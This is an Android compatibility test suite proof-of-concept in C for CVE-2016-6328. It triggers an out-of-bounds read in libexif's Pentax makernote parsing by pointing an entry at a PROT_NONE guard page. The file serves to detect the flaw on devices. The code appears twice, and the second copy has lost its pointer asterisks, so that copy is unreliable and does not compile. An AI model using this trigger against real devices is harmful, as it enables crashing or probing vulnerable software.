hostsidetests/securitybulletin/securityPatch/CVE-2016-6328/poc.c - platform/cts - Gitiles

 /*
  * Copyright (C) 2020 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *      http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 #include <stdlib.h>
 #include <sys/mman.h>
 #include <unistd.h>
 #include "../includes/common.h"
 #include "libexif/exif-data.h"
 #include "libexif/pentax/exif-mnote-data-pentax.h"

 #define NUM_PAGES 2
 #define VULNERABLE_ENTRY_INDEX 6
 #define VALUE_SIZE 1024

 int main(int argc, char **argv) {
     if (argc < 2) {
         return EXIT_FAILURE;
     }

     ExifData *exifData = exif_data_new_from_file(argv[1]);
     if (!exifData) {
         return EXIT_FAILURE;
     }

     ExifMnoteData *mData = exif_data_get_mnote_data(exifData);
     if (!mData) {
         exif_data_unref(exifData);
         return EXIT_FAILURE;
     }

     ExifMnoteDataPentax *mDataPentax = (ExifMnoteDataPentax *)mData;
     if (!mDataPentax) {
         exif_data_unref(exifData);
         return EXIT_FAILURE;
     }

     MnotePentaxEntry *entry = &mDataPentax->entries[VULNERABLE_ENTRY_INDEX];
     if (!entry) {
         exif_data_unref(exifData);
         return EXIT_FAILURE;
     }

     size_t page_size = getpagesize();
     size_t num_pages = NUM_PAGES;
     size_t total_size = page_size * num_pages;
     unsigned char *start_ptr = (unsigned char *)memalign(page_size, total_size);
     if (!start_ptr) {
         exif_data_unref(exifData);
         return EXIT_FAILURE;
     }
     unsigned char *mem_ptr = start_ptr + ((num_pages - 1) * page_size);
     mprotect(mem_ptr, page_size, PROT_NONE);

     unsigned char *prev_ptr = entry->data;
     entry->data = mem_ptr;
     entry->size = 0;

     char value[VALUE_SIZE];
     exif_mnote_data_get_value(mData, VULNERABLE_ENTRY_INDEX, value, sizeof(value));

     entry->data = prev_ptr;
     free(start_ptr);
     exif_data_unref(exifData);
     return EXIT_SUCCESS;
 }
	/*
	* Copyright (C) 2020 The Android Open Source Project
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	#include <stdlib.h>
	#include <sys/mman.h>
	#include <unistd.h>
	#include "../includes/common.h"
	#include "libexif/exif-data.h"
	#include "libexif/pentax/exif-mnote-data-pentax.h"

	#define NUM_PAGES 2
	#define VULNERABLE_ENTRY_INDEX 6
	#define VALUE_SIZE 1024

	int main(int argc, char **argv) {
	if (argc < 2) {
	return EXIT_FAILURE;
	}

	ExifData *exifData = exif_data_new_from_file(argv[1]);
	if (!exifData) {
	return EXIT_FAILURE;
	}

	ExifMnoteData *mData = exif_data_get_mnote_data(exifData);
	if (!mData) {
	exif_data_unref(exifData);
	return EXIT_FAILURE;
	}

	ExifMnoteDataPentax mDataPentax = (ExifMnoteDataPentax )mData;
	if (!mDataPentax) {
	exif_data_unref(exifData);
	return EXIT_FAILURE;
	}

	MnotePentaxEntry *entry = &mDataPentax->entries[VULNERABLE_ENTRY_INDEX];
	if (!entry) {
	exif_data_unref(exifData);
	return EXIT_FAILURE;
	}

	size_t page_size = getpagesize();
	size_t num_pages = NUM_PAGES;
	size_t total_size = page_size * num_pages;
	unsigned char start_ptr = (unsigned char )memalign(page_size, total_size);
	if (!start_ptr) {
	exif_data_unref(exifData);
	return EXIT_FAILURE;
	}
	unsigned char mem_ptr = start_ptr + ((num_pages - 1) page_size);
	mprotect(mem_ptr, page_size, PROT_NONE);

	unsigned char *prev_ptr = entry->data;
	entry->data = mem_ptr;
	entry->size = 0;

	char value[VALUE_SIZE];
	exif_mnote_data_get_value(mData, VULNERABLE_ENTRY_INDEX, value, sizeof(value));

	entry->data = prev_ptr;
	free(start_ptr);
	exif_data_unref(exifData);
	return EXIT_SUCCESS;
	}